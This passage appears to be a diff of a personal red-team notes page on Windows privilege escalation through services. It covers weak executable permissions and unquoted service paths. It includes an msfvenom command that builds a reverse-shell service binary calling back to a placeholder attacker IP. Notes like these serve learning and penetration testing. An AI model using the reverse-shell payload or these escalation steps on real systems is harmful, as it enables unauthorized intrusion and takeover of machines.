Print3M/print3m.github.io/_notes/windows/local/rt/privilege-escalation.md

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f exe-service -o my-service.exe
 ```

-#### 2.2.1.
-Executable permissions
+#### Executable permissions
 The executable associated with a service might have insecure permissions.
 The attacker modifing or replacing the executable can gain the privileges of the service's account.

 ```powershell
 icacls <executable-path>                    # Show DACL of the executable
 ```

-#### 2.2.2.
-Unquoted paths
+#### Unquoted paths
 If the service's executable points to an unquoted path with spaces, SCM tries to execute firt binary which is the first part of the unqoted path.
-This SCM feature is basically disgusting but it works.
+This SCM feature is basically disgusting but it works like that.
 It  allows an attacker to put malicious service binary in the "wrong" path and run it before a legit one will be executed.

 Example: